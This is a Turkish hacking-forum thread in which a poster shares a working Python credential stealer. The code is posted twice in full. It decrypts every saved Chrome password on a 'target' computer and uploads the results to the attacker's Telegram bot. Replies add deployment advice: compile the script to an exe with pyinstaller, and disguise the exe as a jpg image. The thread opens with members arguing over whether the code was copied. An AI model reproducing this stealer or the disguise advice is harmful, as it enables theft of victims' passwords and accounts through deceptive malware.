birincisi kodun şifreleme tarafını başka bir yerden aldığımı zaten belirtmiştim ve o yer burası değil. ayrıca python ile başka stealer yazmak için neredeyse hiç alternatif kütüphane falan yok yani sen nerde python ile yazılmış stealer görürsen gör birbirine çok benzemek zorunda. kendine çok güveniyorsan sen de yaz da görelim.
teşekkür ederim.
Bos konustugunun farkindasin umarim , kodda benzerlik normaldir ancak degisken isimleri bile ayni be) , yani kopyala yapistir + chatgpt ile konu acinca kendin yazmis olmuyorsun . Muhtemelen suçlamadan kaçmak icin bana saldiracaksin,"sende yazda gorelim", "o kadar kolaysa sende bir konu ac" vb . Sorun yok boyle devam et.
İftira atıyorsun bir kere bile chat gpt ye bakmadım. Zaten kodun belli kısmını başka yerden aldığımı söyledim ve orası burası değil anlama kabiliyetinizde biraz sıkıntı var sanırım.
mesajı neden düzenledin?
Eee o zaman niye bu kaynakdan almadim diyorsun ? Degisken isiimleri bile ayni iste , daha nasil bir benzerlik istiyorsun? Anlama kabiliyetimde sıkıntı oldugu kanaatina nasil vardiniz "python" bey? (Ama yorum satirlarini silmeyi iyi akil etmissin
)))))
Demekki bu kaynak birden çok kullanılmış, veya bu kaynak başka yerden almış
ayrıca ilk başta farklı bir şey paylaşmıştı ona cevap verince hemen düzenledi kendi mesajını ve başka linke çevirdi hatasını anlayıp
Her kes senin aldigin yerden caliyor oylemi?Demekki bu kaynak birden çok kullanılmış, veya bu kaynak başka yerden almış
Bak kardeşim bu konu çok uzadı bu son olsun. Ben öyle bir şey mi dedim benim güzel kardeşim lütfen okumayı en kısa sürede öğrenin. Ben başka yerden aldığımı söyledim demekki diyorum ki bu kod çok kez kopyalanmış birden çok yerde paylaşılmış. Lütfen konuyu uzatmama adına burdan tartışmayı sürdürmeyin dm den şikayetlerinizi belirtebilirsiniz.Her kes senin aldigin yerden caliyor oylemi?
Ellerine sağlık çok iyi duruyo
Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.
Daha önceki konularıma şuradan ulaşabilirsiniz: Python ile Hedefi Deli Etmek!Chrome Şifre Grabber:
Python ile RansomWare
NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Python:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import requests def encryption_key(): local_state_yolu = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_yolu, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "" def send_telegram_document(bot_token, chat_id, document_path): url = f"https://api.telegram.org/bot{bot_token}/sendDocument" files = {'document': open(document_path, 'rb')} params = { "chat_id": chat_id, } try: response = requests.post(url, params=params, files=files) except: pass def main(): key = encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromeData.db" shutil.copyfile(db_path, filename) db = sqlite3.connect(filename) cursor = db.cursor() cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") credentials = [] for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: credentials.append({ "Origin URL": origin_url, "Action URL": action_url, "Username": username, "Password": password }) cursor.close() db.close() try: os.remove(filename) except: pass if credentials: bot_token = "BOT TOKENİNİZ" chat_id = "CHAT ID NİZ" document_path = "credentials.txt" with open(document_path, "w") as file: json.dump(credentials, file, indent=4) send_telegram_document(bot_token, chat_id, document_path) os.remove(document_path) if __name__ == "__main__": main()
Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?
ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
hocam elinize sağlık ancak karşı bilgisayarda nasıl çalıştıracağımı anlamadım
Herkese merhaba, bugün sizlere python ile yazılmış olan chrome şifre grabberi paylaşacağım. Bu kod hedef bilgisayarda çalıştırıldığında hedefin chrome daki tüm kayıtlı şifrelerini telegram yoluyla hackera iletmeyi sağlar.
Daha önceki konularıma şuradan ulaşabilirsiniz: Python ile Hedefi Deli Etmek!Chrome Şifre Grabber:
Python ile RansomWare
NOT: ŞİFRELEME İŞLERİNDEN PEK ANLAMADIĞIM İÇİN KODUN YARISINI BAŞKA YERDEN ALDIM.
EĞİTİM AMAÇLIDIR SORUMLULUK KABUL ETMİYORUM
Python:import os import json import base64 import sqlite3 import win32crypt from Crypto.Cipher import AES import shutil import requests def encryption_key(): local_state_yolu = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "Local State") with open(local_state_yolu, "r", encoding="utf-8") as f: local_state = f.read() local_state = json.loads(local_state) key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) key = key[5:] return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] def decrypt_password(password, key): try: iv = password[3:15] password = password[15:] cipher = AES.new(key, AES.MODE_GCM, iv) return cipher.decrypt(password)[:-16].decode() except: try: return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) except: return "" def send_telegram_document(bot_token, chat_id, document_path): url = f"https://api.telegram.org/bot{bot_token}/sendDocument" files = {'document': open(document_path, 'rb')} params = { "chat_id": chat_id, } try: response = requests.post(url, params=params, files=files) except: pass def main(): key = encryption_key() db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", "Google", "Chrome", "User Data", "default", "Login Data") filename = "ChromeData.db" shutil.copyfile(db_path, filename) db = sqlite3.connect(filename) cursor = db.cursor() cursor.execute( "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") credentials = [] for row in cursor.fetchall(): origin_url = row[0] action_url = row[1] username = row[2] password = decrypt_password(row[3], key) date_created = row[4] date_last_used = row[5] if username or password: credentials.append({ "Origin URL": origin_url, "Action URL": action_url, "Username": username, "Password": password }) cursor.close() db.close() try: os.remove(filename) except: pass if credentials: bot_token = "BOT TOKENİNİZ" chat_id = "CHAT ID NİZ" document_path = "credentials.txt" with open(document_path, "w") as file: json.dump(credentials, file, indent=4) send_telegram_document(bot_token, chat_id, document_path) os.remove(document_path) if __name__ == "__main__": main()
Kodumuz bu kadardı, şimdi bakalım telegram adresimize istediğimiz bilgiler düşmüş mü?
ve gördüğünüz gibi hedef makinedeki kayıtlı tüm chrome şifrelerini çaldık. Kodu aynı şekilde başka tarayıcılar içinde uygun hale getirebilirsiniz. Konuyu kısa tutmak adına kodu açıklamıyacağım, fakat isteyen varsa dm den veya burdan yazarsa açıklarım.
Okuduğunuz için teşekkürler ...
dosyayı, exe dosyasına mı çevirip acaba karşı tarafta çalıştırıcaz.. Sanırım birde telegramda bot kurmamız gerekiyor.
Evet telegramda bot kurmanız gerekiyor. Dosyayı pyinstaller yardımı ile exe ye çevirebilirsinizhocam elinize sağlık ancak karşı bilgisayarda nasıl çalıştıracağımı anlamadım
Hocam exe'yide , jpg'ye çevirsem tutar mı?
TutarHocam exe'yide , jpg'ye çevirsem tutar mı?
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.
